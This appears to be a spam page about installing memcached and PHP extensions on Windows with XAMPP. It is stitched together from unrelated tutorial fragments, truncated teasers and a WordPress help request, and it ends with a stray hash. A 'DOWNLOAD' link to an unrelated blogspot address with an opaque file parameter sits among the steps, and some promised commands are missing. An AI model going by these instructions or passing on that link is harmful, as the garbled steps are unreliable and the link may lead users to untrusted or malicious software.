Install Memcached Windows Xampp

Cheryll Witting

Dec 2, 2023, 4:24:44 AM12/2/23
Memcached is originally a linux application, but since it is open-source, it has been compiled for windows. There are two major sources for the pre-built windows binary: Jellycan and Northscale, and both versions can be used. The following are the download links for the memcached windows binaries:
In versions earlier than 1.4.5, memcached can install itself as a service. However, the ability to run memcached as a service is removed since version 1.4.5. Therefore, the installation steps are divided into two categories, part A for memcached prior to version 1.4.5. and part B for memcached version 1.4.5 and later.
Install Memcached Windows Xampp
DOWNLOAD https://3quiildestno.blogspot.com/?file=2wHvb5
In version 1.4.5 or later, memcached cannot run as a service. It must be started as a normal process using the task scheduler. To configure the memcached process to run automatically every time windows start, run a command prompt with elevated privileges, and type the following:
If PEAR is no problem for you, think about how involved tools like memcached, APC, Gearman, etc, are to install on a proper server and then think about the steps that may require to be different on a non-server OS.
In last two posts I described how to install memcached daemon and memcache extension for PHP. Today I'll show you how to configure your PHP to use memcache to handle sessions. One thing I should mention is that when installing memcache you should answer yes when asked 1. Enable memcache session handler support? : yes First of all, lets start two...Read more »
After installing memcached daemon, we have to install memcache PHP extension. yum install php-pecl-memcache or apt-get install php5-memcache If above is not an option try below method. pecl install memcache After successful installation add memcache.so extension to your php.ini file. vim /etc/php.ini Add this line: extension=memcache.so Restart web server service httpd restart Test out...Read more »
If your PDO scripts are crashing Apache after installing xampp 1.7 for windows all you need to do is: download this package -5.2.11-nts-Win32-VC6-x86.zip" unzip copy libmysql.dll into xampp\apache\bin and xampp\php restart apache All should be good now....Read more »
This will start the download of a zip file "php_imagick----.zip". From this .zip you will need to extract only the php_imagick.dll file. Copy php_imagick.dll file and paste in the php/ext folder inside your xampp installation path (tipically C:\xampp\php\ext):
Versions on Windows 8.1
XAMPP 1.8.3
PHP: 5.5.15
memcached-1.4.5-win32 (command prompt (admin): memcached.exe -d install)
DLL download version x86
_memcache-3.0.8-5.5-ts-vc11-x86
PHP.ini: extension=php_memcache.dll
To improve the situation you must replace every localhost entry in your magento installation with 127.0.0.1. Some people make an entry in their windows hosts file that allows localhost to be redirected to 127.0.0.1 , this will improve file serving time but php commands like PDO connect will still produce one second delay each until 127.0.0.1 has replaced localhost in settings.
To avoid windows slow file operations you need a opcode cache php accelerator like APC or WinCache. When developing in windows you can activate IIS and use Microsoft Web Platform Installer to install/configure PHP, MYSQL and WinCache in few clicks. When using xampp you can install APC with or -accelerators/apc.html binaries or building APC with Visual Studio and then configure with directions from internet. From my experience last WinCache version is extremely fast and it is a real safe choice for windows. Very few developers i know use IIS instead of apache due to the bad past of IIS but at this time it is easier to setup, can handle more requests and it is faster in most parts when compared to apache in windows.
Hi,
thanks for very useful how-to.
In my installation with Plesk Obsidian 18.0.36 and CentOs v7.9 the setup of memcached is ok and memcached work ok, but in WordPress not work.
Memcached is regularly up on default port (11211).
I try with Memcachy and Batcache but also with other plugins that use memcached, but nothing.
Very Strange situation.
Is there someone who can help me?
Thanks.
Since Memcached package is available on the default Ubuntu software repository, you will use apt to install it. You will also install libmemcached-tools . This is a set of lightweight library and tools used by the Memcached server.
Laragon is the fastest growing local development environment for PHP, Node.js, Python, Java, Go and Ruby. Laragon comes with bundle of tools like notepad++, cmder, putty, winscp and you can install other tools like phpMyAdmin, git, python, flask, Django etc. It has built-in Apache2, Nginx, Mysql, Memcache and Redis server. You can also upgrade PHP version with ease.
In this tutorial I am going to show you how to install laragon on windows 10.
eebf2c3492